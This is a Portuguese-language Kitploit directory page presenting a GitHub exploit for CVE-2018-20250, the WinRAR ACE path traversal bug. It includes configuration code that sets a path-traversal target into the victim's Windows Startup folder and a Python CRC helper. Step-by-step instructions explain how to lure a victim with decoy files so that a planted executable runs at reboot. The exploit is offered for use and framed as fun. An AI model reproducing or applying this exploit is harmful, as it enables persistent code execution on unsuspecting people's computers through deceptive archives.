Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2018-20250 — exploit para https://research.checkpoint.com/extracting-code-execution-from-winrar | Kitploit
Ferramentas/GitHubGitHub/wyatu/cve-2018-20250
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubwyatu/cve-2018-20250

CVE-2018-20250

exploit para https://research.checkpoint.com/extracting-code-execution-from-winrar

Ver Repositório
492171há 7 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

exp para Extrair Execução de Código do Winrar

poc por Ridter

como usar ?

você só precisa instalar o python 3.7, e preparar um arquivo malicioso que deseja executar, definir os valores que deseja, este script exp gerará o arquivo malicioso automaticamente!

  1. defina os valores que deseja
root@kitploit:~
... ...

# The archive filename you want
rar_filename = "test.rar"
# The evil file you want to run
evil_filename = "calc.exe"
# The decompression path you want, such shown below
target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe"
# Other files to be displayed when the victim opens the winrar
# filename_list=[]
filename_list = ["hello.txt", "world.txt"]

... ...

def get_right_hdr_crc(filename):
    # This command may be different, it depends on the your Python3 environment.
    p = os.popen('py -3 acefile.py --headers %s'%(filename))
    res = p.read()
    pattern = re.compile('right_hdr_crc : 0x(.*?) | struct')
    result = pattern.findall(res)
    right_hdr_crc = result[0].upper()
    return hex2raw4(right_hdr_crc)

... ...

  1. execute o exp, o exp gera o test.rar automaticamente

  2. se a vítima abrir o test.rar, ela verá os arquivos hello.txt e world.txt, você também pode adicionar mais arquivos, arquivos mais atrativos.

  1. quando ele descompactar o arquivo, o diretório de inicialização do usuário da vítima terá mais um arquivo chamado hi.exe, na verdade é um calc.exe. quando ele reiniciar o computador, o hi.exe será executado.

divirta-se! :)

Baixar ferramenta